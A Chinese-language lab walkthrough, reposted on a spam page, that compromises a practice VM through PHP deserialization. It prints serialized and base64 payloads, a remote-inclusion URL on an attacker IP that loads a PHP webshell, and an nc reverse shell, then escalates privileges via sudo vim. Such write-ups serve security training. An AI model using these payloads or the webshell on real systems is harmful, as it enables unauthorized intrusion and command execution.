当前位置: 首页 > news >正文

郑州网站建设天强科技做软件开发的人厉害吗

郑州网站建设天强科技,做软件开发的人厉害吗,还有什么类型的网站,海珠建网站公司目录 一、信息收集 1.探测主机存活#xff08;目标主机IP地址#xff09; 2.访问web服务 3.后台目录和端口扫描 4.解析bak.zip源码 二、漏洞利用 1.构造payload 2.通过bp的repeater模块 3.get shell 4.获取反弹shell 三、提升权限 1. 查看系统版本#xff0c;内核…目录 一、信息收集 1.探测主机存活目标主机IP地址 2.访问web服务 3.后台目录和端口扫描 4.解析bak.zip源码 二、漏洞利用 1.构造payload 2.通过bp的repeater模块 3.get shell 4.获取反弹shell 三、提升权限 1. 查看系统版本内核版本。 2. 查看根目录发现存在敏感文件credentials.txt.bak。 3.打开查看是用户名和密码SSH登录。 4.刚才查看了版本暂时找不到可提权的漏洞那么我们尝试找一下当前用户可执行与无法执行的指令可以看到vim编辑器对所有用户NOPASSWD。 5.尝试提权试试sudo vim进入到命令模式输入!bash。 6.提权成功 一、信息收集 1.探测主机存活目标主机IP地址 2.访问web服务 1.首先访问80端口页面只有一行文本Hello sk4This is a beta test for new cookie handler在首页中并未有任何有价值的信息 3.后台目录和端口扫描 开启80和22端口说明可能用到远程连接。 经过扫描后我们我们尝试访问扫描结果对应的目录,结果发现在/backup目录下存在压缩包 4.解析bak.zip源码 下载解压后,存有三个php文件 整理思路: 首次访问网站后,后台会创建一个user对象,并且内部又为wel变量创建welcome对象,同时进行序列化base64编码存入cookie我们抓一下页面的包发现cookie。 这里的cookie便是后台通过base64编码后的结果 使用base64解码后得到的结果 O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}}7 二、漏洞利用 1.构造payload 由于空格在url地址中无法识别,所以将所有空格转为8进制\x00 同时由于文件包含参数为type_log,所以内容应为文件路径 O:4:“User”:2:{s:10:“\x00User\x00name”;s:3:“sk4”;s:9:“\x00User\x00wel”;O:3:“Log”:1:{s:8:“type_log”;s:11:“/etc/passwd”}} 编码后的payload如下 Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ 2.通过bp的repeater模块 成功访问到信息,可以看到sk4用户属性为/bin/bash 3.get shell 1.构造序列化语句上传shell ?php system($_GET[cmd]);? 2.然后构造payload O:4:User:2:{s:10:\x00User\x00name;s:5:admin;s:9:\x00User\x00wel;O:3:Log:1:{s:8:type_log;s:26:http://本地IP/c.txt;}} 然后进行序列化和base64编码执行。代码如下 ?phpclass Log {private $type_log http://192.168.3.222/c.txt;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();} } $obj new User(); echo base64_encode(serialize($obj));64编码后的payload Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjU2LjEvc2hlbGwudHh0Ijt9fQ 3.用burpsuite上传 成功执行一句话木马 4.获取反弹shell 直接使用nc工具来尝试回弹一个shell 在kali中使用nc监听7777端口等待靶机访问 成功回弹!! 三、提升权限 1. 查看系统版本内核版本。 2. 查看根目录发现存在敏感文件credentials.txt.bak。 3.打开查看是用户名和密码SSH登录。 4.刚才查看了版本暂时找不到可提权的漏洞那么我们尝试找一下当前用户可执行与无法执行的指令可以看到vim编辑器对所有用户NOPASSWD。 5.尝试提权试试sudo vim进入到命令模式输入!bash。 6.提权成功
http://www.w-s-a.com/news/80721/

相关文章:

  • 网站开发技术背景介绍wordpress数据库重置密码
  • 开发建设网站的实施过程是一个logo设计品牌
  • 做360pc网站排名首页工程造价信息网官网首页
  • 产品销售网站模块如何设计大数据和网站开发
  • 现在帮别人做网站赚钱不济南做网站建设公司
  • 嘉兴网站建设哪家好最近三天的国际新闻大事
  • 安丘网站建设制作做网站口碑比较好的大公司
  • 成都专业做网站公司哪家好优化大师下载安装免费
  • 防蚊手环移动网站建设广东深圳有几个区
  • 网站建设找哪些平台宜兴网站开发
  • 免费网站应用软件wordpress添加动态图标
  • 中小企业网站建设客户需求调查问卷昆明网站建设一条龙
  • 网站内容的特点wordpress 移动端网页
  • 专门网站建设培训网站系统建设
  • 自己设计手机的网站wordpress主题加密教程
  • 北京网站建设公司飞沐卖水果网站建设的策划书
  • 北京免费自己制作网站短视频宣传片制作
  • 怎样进入谷歌网站电子商务网站建设软件选择
  • 建个普通网站多少钱设计师培训多少
  • 建设校园网站的意义视频链接提取下载
  • 天津电子商务网站wordpress安装图片
  • 青岛房产网站东莞网络营销外包公司
  • 网站建设中的页数网上工伤做实网站
  • 给公司做网站这个工作怎么样wordpress不支持中文标签
  • 湖南网站推广优化cc域名做门户网站
  • 网站开发大概多久怎么制做网站
  • 鄂州官方网站食品网站建设需求分析
  • 福州网站建设金森要做好网络营销首先要
  • 中山哪里有好网站建设公司企业培训考试平台下载
  • 域名备案查询 网站备案查询企业网站建设问题研究